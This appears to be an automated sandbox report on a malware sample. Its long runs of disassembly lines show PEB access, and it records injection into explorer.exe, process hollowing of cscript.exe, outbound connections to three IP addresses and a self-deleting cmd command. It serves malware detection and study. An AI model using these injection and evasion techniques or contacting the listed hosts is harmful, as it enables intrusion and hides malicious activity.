Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]	7_2_04816DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]	7_2_04816DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]	7_2_04816DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]	7_2_04816DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]	7_2_0479AD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]	7_2_047A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]	7_2_0485FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]	7_2_0485FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]	7_2_0485FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]	7_2_0485FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]	7_2_04848DF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]	7_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]	7_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]	7_2_04868D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]	7_2_0481A537
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]	7_2_0485E539
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]	7_2_04813540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04843D40 mov eax, dword ptr fs:[00000030h]	7_2_04843D40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]	7_2_047C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]	7_2_047C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]	7_2_047C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]	7_2_047C35A1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]	7_2_047CFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]	7_2_047CFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]	7_2_04792D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]	7_2_04792D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]	7_2_04792D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]	7_2_04792D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]	7_2_04792D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]	7_2_0482FE87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]	7_2_047BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]	7_2_047BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]	7_2_047BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]	7_2_047BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]	7_2_047BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]	7_2_047A766D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]	7_2_04860EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]	7_2_04860EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]	7_2_04860EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]	7_2_048146A7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]	7_2_047A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]	7_2_0484FEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]	7_2_04868ED6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]	7_2_0479E620
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]	7_2_047CA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]	7_2_047CA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]	7_2_0479C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]	7_2_0479C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]	7_2_0479C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]	7_2_047C8E00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]	7_2_04851608
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]	7_2_047A76E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]	7_2_047C16E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]	7_2_047C36CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]	7_2_047D8EC7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]	7_2_0484FE3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]	7_2_0485AE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]	7_2_0485AE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]	7_2_04817794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]	7_2_04817794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]	7_2_04817794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]	7_2_047AFF60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]	7_2_047AEF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]	7_2_047CE730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]	7_2_04794F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]	7_2_04794F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]	7_2_047BF716
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]	7_2_047CA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]	7_2_047CA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]	7_2_047D37F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]	7_2_0486070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]	7_2_0486070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]	7_2_0482FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]	7_2_0482FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]	7_2_04868F6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]	7_2_047A8794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]	7_2_04813884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]	7_2_04813884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]	7_2_047B0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]	7_2_047B0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]	7_2_047AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]	7_2_047AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]	7_2_047AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]	7_2_047AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]	7_2_047C002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]	7_2_047C002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]	7_2_047C002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]	7_2_047C002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]	7_2_047C002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0482B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]	7_2_04864015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]	7_2_04864015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]	7_2_047958EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]	7_2_04817016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]	7_2_04817016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]	7_2_04817016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]	7_2_047940E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]	7_2_047940E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]	7_2_047940E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]	7_2_047CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]	7_2_047CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]	7_2_047CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]	7_2_047D90AF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]	7_2_04861074
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]	7_2_04852073
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]	7_2_04799080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]	7_2_0479B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]	7_2_0479B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]	7_2_0479C962
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]	7_2_048549A4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]	7_2_048549A4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]	7_2_048549A4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]	7_2_048549A4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]	7_2_048169A6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]	7_2_047BB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]	7_2_047BB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]	7_2_048151BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]	7_2_048151BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]	7_2_048151BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]	7_2_048151BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]	7_2_047C513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]	7_2_047C513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]	7_2_048241E8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]	7_2_04799100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]	7_2_04799100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]	7_2_04799100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0479B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0479B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0479B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]	7_2_047C61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]	7_2_047C61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]	7_2_047C2990
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]	7_2_047BC182
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]	7_2_047CA185
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]	7_2_047D927A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]	7_2_04799240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]	7_2_04799240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]	7_2_04799240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]	7_2_04799240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]	7_2_047D4A2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]	7_2_047D4A2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]	7_2_047B3A1C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]	7_2_04795210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]	7_2_04795210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]	7_2_04795210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]	7_2_04795210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]	7_2_0479AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]	7_2_0479AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]	7_2_047A8A0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485AA16 mov eax, dword ptr fs:[00000030h]	7_2_0485AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485AA16 mov eax, dword ptr fs:[00000030h]	7_2_0485AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2AE4 mov eax, dword ptr fs:[00000030h]	7_2_047C2AE4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2ACB mov eax, dword ptr fs:[00000030h]	7_2_047C2ACB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AAAB0 mov eax, dword ptr fs:[00000030h]	7_2_047AAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AAAB0 mov eax, dword ptr fs:[00000030h]	7_2_047AAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CFAB0 mov eax, dword ptr fs:[00000030h]	7_2_047CFAB0

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.183.162.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1190000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: B8F008	Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
